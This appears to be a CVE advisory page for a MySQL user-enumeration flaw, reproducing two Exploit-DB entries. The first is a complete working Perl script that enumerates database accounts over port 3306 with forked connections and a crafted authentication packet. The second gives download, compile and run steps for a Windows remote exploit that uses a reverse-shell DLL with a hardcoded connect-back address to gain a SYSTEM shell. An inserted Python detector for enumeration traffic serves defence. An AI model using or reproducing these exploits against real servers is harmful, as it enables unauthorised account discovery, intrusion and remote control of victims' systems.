Related Weaknesses
CWE-ID | Weakness Name | Source
CWE-200 | Exposure of Sensitive Information to an Unauthorized Actor: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 5 | | AV:N/AC:L/Au:N/C:P/I:N/A:N | [email protected]
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.
Exploit information
Exploit Database EDB-ID : 23081
Publication date : 2012-12-01 23h00 +00:00
Author : kingcope
EDB Verified : Yes
# MySQL User Account Enumeration Utility
# When an attacker authenticates using an incorrect password
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
# the mysql server will respond with a different message than Access Denied, what makes
# User Account Enumeration possible.
# The Downside is that the attacker has to reconnect for each user enumeration attempt
#20000 user accounts in 7 minutes
#Mon Jan 16 09:00:18 UTC 2012
#Mon Jan 16 09:07:26 UTC 2012
#root@vs2067037:~# wc -l MEDIUM.LST
#21109 MEDIUM.LST
#A usernames.txt wordlist is included in this package
#examples:
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: administrator@host
#
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt
#
#[*] HIT! -- USER EXISTS: admin@host
#
use IO::Socket;
use Parallel::ForkManager;
$|=1;
if ($#ARGV != 1) {
print "Usage: mysqlenumerate.pl <target> <wordlist>\n";
exit;
}
$target = $ARGV[0];
$wordlist = $ARGV[1];
$numforks = 50;
$pm = new Parallel::ForkManager($numforks);
open FILE,"<$wordlist";
unlink '/tmp/cracked';
@users = ();
$k=0;
while(<FILE>) {
chomp;
$_ =~ s/\r//g;
$users[$k++] = $_;
}
close FILE;
$k2 = 0;
for(;;) {
for ($k=0;$k<$numforks;$k++) {
$k2++;
if (($k2 > $#users) or (-e '/tmp/cracked')) {
exit;
}
my $pid = $pm->start and next;
$user = $users[$k2];
goto further;
again:
print "Connect Error\n";
further:
my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '3306',
Proto => 'tcp') || goto again;
recv($sock, $buff, 1024, 0);
$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".
"\x4e\x5f\x51\x55\x45\x4d\x45\x00";
$buf = chr(length($buf)-3). $buf;
print $sock $buf;
$res = recv($sock, $buff, 1024, 0);
close($sock);
if ($k2 % 100 == 0) {
print $buff."\n";
}
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
unless (-e '/tmp/cracked') {
open FILE, ">/tmp/cracked";
close FILE;
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
open FILE, ">jackpot";
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
exit;
}
}
$pm->wait_all_children;
}
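Added example (not part of the Exploit-DB entry or of the original page): a defender-side check for the traffic pattern the script header describes, one reconnect per guessed name at roughly 20000 names in 7 minutes. The event tuple format, the window and the threshold are assumptions; the events are expected to come from whatever connection audit source is available.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 60      # assumed look-back window
MAX_DISTINCT_USERS = 20  # assumed threshold; tune against your own baseline

def find_enumeration_sources(events, window=WINDOW_SECONDS, limit=MAX_DISTINCT_USERS):
    """events: (epoch_seconds, source_ip, username) tuples sorted by time.
    Returns {source_ip: time it first exceeded `limit` distinct usernames
    within one sliding window}."""
    recent = defaultdict(deque)                     # source -> (ts, user) still in window
    counts = defaultdict(lambda: defaultdict(int))  # source -> user -> attempts in window
    flagged = {}
    for ts, src, user in events:
        q, c = recent[src], counts[src]
        q.append((ts, user))
        c[user] += 1
        # Drop attempts that have aged out of the window.
        while q and q[0][0] <= ts - window:
            _, old = q.popleft()
            c[old] -= 1
            if c[old] == 0:
                del c[old]
        if len(c) > limit and src not in flagged:
            flagged[src] = ts
    return flagged

def constructed_events():
    """Constructed sample data (documentation address ranges), not a real capture."""
    ev = []
    # One source cycling names at the header's rate: 20000 / 428 s, about 47 per second.
    for i in range(235):
        ev.append((1000 + i / 47, "203.0.113.7", f"user{i:04d}"))
    # Application reconnecting with a single account every 2 seconds.
    for i in range(60):
        ev.append((1000 + 2 * i, "198.51.100.20", "app"))
    # Operator trying three accounts by hand.
    for i, name in enumerate(["root", "admin", "backup"]):
        ev.append((1010 + 15 * i, "192.0.2.5", name))
    return sorted(ev)

if __name__ == "__main__":
    for src, ts in find_enumeration_sources(constructed_events()).items():
        print(f"possible account enumeration from {src} at t={ts:.2f}")
```

Counting distinct usernames rather than raw connections keeps a busy application that reconnects with one account from being flagged.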
Exploit Database EDB-ID : 23073
Publication date : 2012-12-01 23h00 +00:00
Author : kingcope
EDB Verified : Yes
***
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
***
Attached is the MySQL Windows Remote Exploit (post-auth, udf
technique) including the previously released mass scanner.
The exploit is mirrored at the farlight website http://www.farlight.org.
Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
All owned By Kingcope
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz
Installation Instructions
=============================
1. Install mysql client libraries and headers (UNIX)
RedHat based (e.g. CentOS):
yum install mysql mysql-devel
2. Compile the standalone exploit
issue commands:
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient
3. Compile the reverse shell payload (this is required!)
required because the connect back ip and port are hardcoded in the dll:
use mingw on windows or wine
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
to change the port in mysqljackpot.c too (default port: 443).
issue commands:
set PATH=%PATH%;c:\MinGW\bin\
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32
copy the payload.dll into the mysqljackpot exploit folder
4. Run The Exploit
./mysqljackpot -u root -p "" -t 99.99.99.99
A valid database admin user and his password are required
for the exploit to work properly.
This exploit is especially useful when used in connection
to a MySQL login scanner, see scanner/README.mysql inside this package.
Be sure to have the firewall open on the desired reverse port
on the attacking machine.
5. Enjoy your SYSTEM Shell!!!
Yours Sincerely,
-- Kingcope
Products Mentioned
Configuration 0
Mariadb>>Mariadb >> Version 5.1.66
Mariadb>>Mariadb >> Version 5.2.13
Mariadb>>Mariadb >> Version 5.3.11
Mariadb>>Mariadb >> Version 5.5.28a
Oracle>>Mysql >> Version 5.5.19
References